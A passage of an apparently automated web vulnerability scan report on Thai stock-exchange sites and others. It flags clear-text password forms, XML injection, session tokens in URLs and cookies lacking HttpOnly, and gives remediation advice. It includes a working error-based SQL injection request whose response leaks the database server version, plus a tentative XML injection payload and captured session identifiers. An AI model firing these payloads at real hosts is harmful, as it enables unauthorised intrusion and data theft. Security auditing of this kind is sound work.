<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head id="ctl00_Head1">
...[SNIP]...
<div id="container">
<form name="aspnetForm" method="post" action="forgetpassword.aspx" id="aspnetForm">
<div>
...[SNIP]...
<td align="left" valign="middle">

<input name="ctl00$_contentBody$txtPassword" type="password" id="ctl00__contentBody_txtPassword" class="large2_imputbox" />
</td>
...[SNIP]...

4.5. http://www.mymemorysafe.com/signin.aspx previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mymemorysafe.com
Path:	/signin.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mymemorysafe.com/signin.aspx

The form contains the following password field:

ctl00$_contentBody$txtPassword

Request

GET /signin.aspx HTTP/1.1
Host: www.mymemorysafe.com
Proxy-Connection: keep-alive
Referer: http://yesvideo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=zhleaz45krgf1j550jyph455; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 15:16:37 GMT
Content-Length: 18526

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head id="ctl00_Head1">
...[SNIP]...
<div id="container">
<form name="aspnetForm" method="post" action="signin.aspx" id="aspnetForm">
<div>
...[SNIP]...
</label><input name="ctl00$_contentBody$txtPassword" type="password" id="ctl00__contentBody_txtPassword" size="27" /></div>
...[SNIP]...

5. XML injection previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://lvs.truehits.in.th
Path:	/goggen.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.

Request

GET /goggen.php]]>>?hc=c0002486&bv=0&rf=http%3A//marketdata.set.or.th/head-en.html&test=TEST&web=%2bm9yd4xiL2sRAHTjxRzQBA%3D%3D&bn=Netscape&ss=1920*1200&sc=16&sv=1.3&ck=y&ja=y&vt=0E309294.1&fp=&fv=-&truehitspage=en%20-%20Index&truehitsurl=http%3a//www.set.or.th/en/index.html HTTP/1.1
Host: lvs.truehits.in.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: ck3rdparty=1; truehitsid=3zNka1mr

Response

HTTP/1.1 404 Not Found
P3P: CP=NOI DSP COR NID ADMa OUR IND NAV; policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 345
Connection: close
Date: Tue, 03 May 2011 14:30:09 GMT
Server: lighttpd

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

6. SQL statement in request parameter previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://register2.set.or.th
Path:	/semreg/enroll.aspx

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

Request

GET /semreg/enroll.aspx?ow='%2B%20(select+convert(int,CHAR(95)%2bCHAR(33)%2bCHAR(64)%2b(SELECT%20@@VERSION)%2bCHAR(95)%2bCHAR(33)%2bCHAR(64))+FROM+syscolumns)%20%2B'&cs=S0001&sn=0049 HTTP/1.1
Referer: http://register2.set.or.th/semreg/detail.aspx?ow=FKH&cs=S0001&sn=0049
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: register2.set.or.th
Cookie: ASP.NET_SessionId=mlxph5zrf22wfj45pw45am55
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 14:20:58 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=windows-874
Content-Length: 6550

<html>
<head>
<title>Syntax error converting the nvarchar value '_!@Microsoft SQL Server 2000 - 8.00.760 (Intel X86)
Dec 17 2002 14:22:05
Copyright (c) 1988-2003 Microsoft Corporati
...[SNIP]...

7. Session token in URL previous next
There are 7 instances of this issue:

http://marketdata.set.or.th/mkt/styles/setstyle.css
http://marketdata.set.or.th/static/market/set/indextab_en_US.html
http://www.set.or.th/highlight/release_en_US.html
http://www.set.or.th/set/newsdetails.do
http://www.set.or.th/set/newsrelease.do
http://www.set.or.th/set/styles/setstyle.css
http://www.set.or.th/static/news/latestnews_en_US.html

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

7.1. http://marketdata.set.or.th/mkt/styles/setstyle.css previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://marketdata.set.or.th
Path:	/mkt/styles/setstyle.css

Issue detail

The URL in the request appears to contain a session token within the query string:

http://marketdata.set.or.th/mkt/styles/setstyle.css;jsessionid=9455A6EBA04DDE72DCE295B2C73AA842

Request

GET /mkt/styles/setstyle.css;jsessionid=9455A6EBA04DDE72DCE295B2C73AA842 HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/static/market/set/indextab_en_US.html
Cookie: verify=test; JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=213194248.998969890.1304449190.1304449190.1304449190.1; __utmb=213194248; __utmc=213194248; __utmz=213194248.1304449190.1.1.utmccn=(referral)|utmcsr=set.or.th|utmcct=/en/sitemap/for_listing.html|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:23:47 GMT
Server: Apache-Coyote/1.1
ETag: W/"13044-1303176648000"
Last-Modified: Tue, 19 Apr 2011 01:30:48 GMT
Content-Type: text/css
Content-Length: 13044

table {FONT: 10pt Tahoma, MS Sans Serif, Microsoft Sans Serif, Verdana, AngsanaUPC, CordiaUPC; COLOR: #000000; TEXT-DECORATION: none}
body {FONT: 10pt Tahoma, MS Sans Serif, Microsoft Sans Serif, Ver
...[SNIP]...

7.2. http://marketdata.set.or.th/static/market/set/indextab_en_US.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://marketdata.set.or.th
Path:	/static/market/set/indextab_en_US.html

Issue detail

The response contains the following links that appear to contain session tokens:

http://marketdata.set.or.th/mkt/styles/setstyle.css;jsessionid=5C3E81A98EB963A94501B4FC2A2A49C7

Request

GET /static/market/set/indextab_en_US.html HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/integrated-set.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=213194248.998969890.1304449190.1304449190.1304449190.1; __utmb=213194248; __utmc=213194248; __utmz=213194248.1304449190.1.1.utmccn=(referral)|utmcsr=set.or.th|utmcct=/en/sitemap/for_listing.html|utmcmd=referral
If-Modified-Since: Tue, 03 May 2011 13:41:00 GMT
If-None-Match: "4602d1-4324-4a5c5300"

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:23:44 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 14:23:00 GMT
ETag: "61c3af-4324-e0907900"
Accept-Ranges: bytes
Content-Length: 17188
Content-Type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<title></title>
<link href="/mkt/styles/setstyle.css;jsessionid=5C3E81A98EB963A94501B4FC2A2A49C7" rel="stylesheet" type="text/css">
</head>
...[SNIP]...

7.3. http://www.set.or.th/highlight/release_en_US.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.set.or.th
Path:	/highlight/release_en_US.html

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.set.or.th/set/newsdetails.do;jsessionid=B784B24EBBBC521701E53D4C6FE368BF?type=R&time=1304399591000&filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111213110460E.txt&source=SET&headline=TFEX+News+%3A%28correction%29++TFEX+news+%3A+Thai+bourse+to+trades+silver+futures+on+June+20+and+to...&symbol=SET&language=en&country=US
http://www.set.or.th/set/newsdetails.do;jsessionid=B784B24EBBBC521701E53D4C6FE368BF?type=R&time=1304426046000&filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111934060032E.txt&source=SET&headline=SET+News+%3AThai+bourse+to+promote+brokerage+firms%27+full+range+of+services&symbol=SET&language=en&country=US
http://www.set.or.th/set/newsdetails.do;jsessionid=B784B24EBBBC521701E53D4C6FE368BF?type=R&time=1304426269000&filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111937490383E.txt&source=SET&headline=SET+News+%3AThai+bourse+launches+%22Financial++Freedom+Academy+Project%22+on+www.settrade.com&symbol=SET&language=en&country=US

Request

GET /highlight/release_en_US.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/highlight/info_en.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
If-Modified-Since: Tue, 03 May 2011 13:41:01 GMT
If-None-Match: "134ed6-12ca-4a6b9540"

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:23:40 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 14:23:01 GMT
ETag: "134ed6-12ca-e09fbb40"
Accept-Ranges: bytes
Content-Length: 4810
Content-Type: text/html

<html>
<head>
<link href="/setstyle.css" rel="stylesheet" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<script language="j
...[SNIP]...
<td colspan="7"><a href="/set/newsdetails.do;jsessionid=B784B24EBBBC521701E53D4C6FE368BF?type=R&time=1304426269000&filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111937490383E.txt&source=SET&headline=SET+News+%3AThai+bourse+launches+%22Financial++Freedom+Academy+Project%22+on+www.settrade.com&symbol=SET&language=en&country=US" target="_blank" class="indexleft">SET News :Thai bourse launches "Financial Freedom Academy Project" on www.settrade.com [03/05/11]</a>
...[SNIP]...
<td colspan="7"><a href="/set/newsdetails.do;jsessionid=B784B24EBBBC521701E53D4C6FE368BF?type=R&time=1304426046000&filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111934060032E.txt&source=SET&headline=SET+News+%3AThai+bourse+to+promote+brokerage+firms%27+full+range+of+services&symbol=SET&language=en&country=US" target="_blank" class="indexleft">SET News :Thai bourse to promote brokerage firms' full range of services [03/05/11]</a>
...[SNIP]...
<td colspan="7"><a href="/set/newsdetails.do;jsessionid=B784B24EBBBC521701E53D4C6FE368BF?type=R&time=1304399591000&filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111213110460E.txt&source=SET&headline=TFEX+News+%3A%28correction%29++TFEX+news+%3A+Thai+bourse+to+trades+silver+futures+on+June+20+and+to...&symbol=SET&language=en&country=US" target="_blank" class="indexleft">TFEX News :(correction) TFEX news : Thai bourse to trades silver futures on June 20 and to... [03/05/11]</a>
...[SNIP]...

7.4. http://www.set.or.th/set/newsdetails.do previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.set.or.th
Path:	/set/newsdetails.do

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.set.or.th/set/newsdetails.do;jsessionid=B784B24EBBBC521701E53D4C6FE368BF?type=R&time=1304399591000&filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111213110460E.txt&source=SET&headline=TFEX+News+%3A%28correction%29++TFEX+news+%3A+Thai+bourse+to+trades+silver+futures+on+June+20+and+to...&symbol=SET&language=en&country=US

Request

GET /set/newsdetails.do;jsessionid=B784B24EBBBC521701E53D4C6FE368BF?type=R&time=1304399591000&filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111213110460E.txt&source=SET&headline=TFEX+News+%3A%28correction%29++TFEX+news+%3A+Thai+bourse+to+trades+silver+futures+on+June+20+and+to...&symbol=SET&language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/highlight/release_en_US.html
Cookie: verify=test; JSESSIONID=A7D7E763B478E7E987ADE6B9FDAE7E3D; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

7.5. http://www.set.or.th/set/newsrelease.do previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.set.or.th
Path:	/set/newsrelease.do

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.tfex.co.th/tfex/releasedNews.html;jsessionid=506B87DBA78A6EE85EDE591E3A51E618?locale=en_US

Request

GET /set/newsrelease.do?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/set/newslist.do?language=en&country=US&to=&exchange=true&submit=Search&newsType=CASH_BALANCE&exchangeSymbols=&companyNews=on&from=&exchangeNews=on&company=true&symbol=&headline=to+be+traded+in+Cash+Balance
Cookie: verify=test; JSESSIONID=54F91FCDB4DAE1F4AA35C30AFFB2AE74; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

7.6. http://www.set.or.th/set/styles/setstyle.css previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.set.or.th
Path:	/set/styles/setstyle.css

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.set.or.th/set/styles/setstyle.css;jsessionid=4D9D396F7C06EDD1579ADA261CDD9CB3

Request

GET /set/styles/setstyle.css;jsessionid=4D9D396F7C06EDD1579ADA261CDD9CB3 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.set.or.th

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:40:02 GMT
Server: Apache-Coyote/1.1
ETag: W/"14950-1295397888000"
Last-Modified: Wed, 19 Jan 2011 00:44:48 GMT
Content-Type: text/css
Content-Length: 14950

table {FONT: 10pt Tahoma, MS Sans Serif, Microsoft Sans Serif, Verdana, AngsanaUPC, CordiaUPC; COLOR: #000000; TEXT-DECORATION: none}
body {FONT: 10pt Tahoma, MS Sans Serif, Microsoft Sans Serif, Ver
...[SNIP]...

7.7. http://www.set.or.th/static/news/latestnews_en_US.html previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.set.or.th
Path:	/static/news/latestnews_en_US.html

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.set.or.th/set/newsdetails.do;jsessionid=129A90B59C99B4ABACD21E811DDD5505?type=R&time=1304421379000&filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111816190665E.txt&source=SET&headline=SET+removes+causes+of+possible+delisting+of+EARTH+%26+resumes+trading+on+mai+from+May+18%2C+11+onwards&symbol=SET&language=en&country=US
http://www.set.or.th/set/newsdetails.do;jsessionid=129A90B59C99B4ABACD21E811DDD5505?type=R&time=1304421379000&filename=dat%2Fprsnews%2Fnews%2F0551NWS030520111816190696E.txt&source=SET&headline=SET+removes+causes+of+possible+delisting+of+EARTH+%26+resumes+trading+on+mai+from+May+18%2C+11+onwards&symbol=EARTH&language=en&country=US
http://www.set.or.th/set/newsdetails.do;jsessionid=129A90B59C99B4ABACD21E811DDD5505?type=R&time=1304421379000&filename=dat%2Fprsnews%2Fnews%2F8000NWS030520111816190619E.txt&source=mai&headline=SET+removes+causes+of+possible+delisting+of+EARTH+%26+resumes+trading+on+mai+from+May+18%2C+11+onwards&symbol=mai&language=en&country=US
http://www.set.or.th/set/newsdetails.do;jsessionid=129A90B59C99B4ABACD21E811DDD5505?type=R&time=1304426046000&filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111934060032E.txt&source=SET&headline=SET+News+%3AThai+bourse+to+promote+brokerage+firms%27+full+range+of+services&symbol=SET&language=en&country=US
http://www.set.or.th/set/newsdetails.do;jsessionid=129A90B59C99B4ABACD21E811DDD5505?type=R&time=1304426269000&filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111937490383E.txt&source=SET&headline=SET+News+%3AThai+bourse+launches+%22Financial++Freedom+Academy+Project%22+on+www.settrade.com&symbol=SET&language=en&country=US
http://www.set.or.th/set/newslistinput.do;jsessionid=129A90B59C99B4ABACD21E811DDD5505?language=en&country=US
http://www.set.or.th/set/todaynews.do;jsessionid=129A90B59C99B4ABACD21E811DDD5505?language=en&country=US

Request

GET /static/news/latestnews_en_US.html HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
If-Modified-Since: Tue, 03 May 2011 13:41:00 GMT
If-None-Match: "ccac3-21ae-4a5c5300"

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:23:36 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 14:23:00 GMT
ETag: "900fc-21ae-e0907900"
Accept-Ranges: bytes
Content-Length: 8622
Content-Type: text/html

<html>
<head>
<link href="/setstyle.css" rel="stylesheet" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<script language="javaScript">

...[SNIP]...
</a>
<a href="/set/todaynews.do;jsessionid=129A90B59C99B4ABACD21E811DDD5505?language=en&country=US" target="_parent">News Today</a> |
<a href="/set/newslistinput.do;jsessionid=129A90B59C99B4ABACD21E811DDD5505?language=en&country=US" target="_parent">News Archive</a>
...[SNIP]...
<td><a href="/set/newsdetails.do;jsessionid=129A90B59C99B4ABACD21E811DDD5505?type=R&time=1304426269000&filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111937490383E.txt&source=SET&headline=SET+News+%3AThai+bourse+launches+%22Financial++Freedom+Academy+Project%22+on+www.settrade.com&symbol=SET&language=en&country=US" target="_blank" class="indexleft">SET News :Thai bourse launches "Financial Freedom Academy Project" on www.settrade.com</a>
...[SNIP]...
<td><a href="/set/newsdetails.do;jsessionid=129A90B59C99B4ABACD21E811DDD5505?type=R&time=1304426046000&filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111934060032E.txt&source=SET&headline=SET+News+%3AThai+bourse+to+promote+brokerage+firms%27+full+range+of+services&symbol=SET&language=en&country=US" target="_blank" class="indexleft">SET News :Thai bourse to promote brokerage firms' full range of services</a>
...[SNIP]...
<td><a href="/set/newsdetails.do;jsessionid=129A90B59C99B4ABACD21E811DDD5505?type=R&time=1304421379000&filename=dat%2Fprsnews%2Fnews%2F8000NWS030520111816190619E.txt&source=mai&headline=SET+removes+causes+of+possible+delisting+of+EARTH+%26+resumes+trading+on+mai+from+May+18%2C+11+onwards&symbol=mai&language=en&country=US" target="_blank" class="indexleft">SET removes causes of possible delisting of EARTH & resumes trading on mai from May 18, 11 onwards</a>
...[SNIP]...
<td><a href="/set/newsdetails.do;jsessionid=129A90B59C99B4ABACD21E811DDD5505?type=R&time=1304421379000&filename=dat%2Fprsnews%2Fnews%2F0000NWS030520111816190665E.txt&source=SET&headline=SET+removes+causes+of+possible+delisting+of+EARTH+%26+resumes+trading+on+mai+from+May+18%2C+11+onwards&symbol=SET&language=en&country=US" target="_blank" class="indexleft">SET removes causes of possible delisting of EARTH & resumes trading on mai from May 18, 11 onwards</a>
...[SNIP]...
<td><a href="/set/newsdetails.do;jsessionid=129A90B59C99B4ABACD21E811DDD5505?type=R&time=1304421379000&filename=dat%2Fprsnews%2Fnews%2F0551NWS030520111816190696E.txt&source=SET&headline=SET+removes+causes+of+possible+delisting+of+EARTH+%26+resumes+trading+on+mai+from+May+18%2C+11+onwards&symbol=EARTH&language=en&country=US" target="_blank" class="indexleft">SET removes causes of possible delisting of EARTH & resumes trading on mai from May 18, 11 onwards</a>
...[SNIP]...

8. Cookie without HttpOnly flag set previous next
There are 20 instances of this issue:

http://marketdata.set.or.th/mkt/ftsequotation.do
http://marketdata.set.or.th/mkt/stockquotation.do
http://weblink.settrade.com/actions/customization/IPO/setIndexHome.jsp
http://weblink.settrade.com/actions/customization/IPO/tfexHome_en.jsp
http://www.mymemorysafe.com/RSS2HTMLPro.asp
http://www.sec.or.th/
http://www.sec.or.th/view/truehitsstat.jsp
http://www.sec.or.th/view/view.jsp
http://www.set.or.th/set/newsdetails.do
http://www.set.or.th/set/newsrelease.do
http://www.set.or.th/set/oppdaybyperiod.do
http://www.set.or.th/set/xcalendar.do
http://www.thai-iod.com/en/index.asp
http://banner2.set.or.th/www/delivery/afr.php
http://banner2.set.or.th/www/delivery/afr.php
http://banner2.set.or.th/www/delivery/ck.php
http://banner2.set.or.th/www/delivery/lg.php
http://c.statcounter.com/t.php
http://yesvideo.app101.hubspot.com/salog.js.aspx
http://zeus.flexserving.com/apps/serve/delivery/ajs.php

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

8.1. http://marketdata.set.or.th/mkt/ftsequotation.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://marketdata.set.or.th
Path:	/mkt/ftsequotation.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=5F6314395BD7BAE741732C9A55ED1C15; Path=/mkt

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mkt/ftsequotation.do?indexID=FSTHL&language=en&country=US HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/static/market/set/indextab_en_US.html
Cookie: verify=test; JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=213194248.998969890.1304449190.1304449190.1304449190.1; __utmb=213194248; __utmc=213194248; __utmz=213194248.1304449190.1.1.utmccn=(referral)|utmcsr=set.or.th|utmcct=/en/sitemap/for_listing.html|utmcmd=referral

Response

8.2. http://marketdata.set.or.th/mkt/stockquotation.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://marketdata.set.or.th
Path:	/mkt/stockquotation.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=5213BD46996FCAB262CBCFD14F60AD02; Path=/mkt

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /mkt/stockquotation.do?language=en&country=US HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/shortcut-en.html
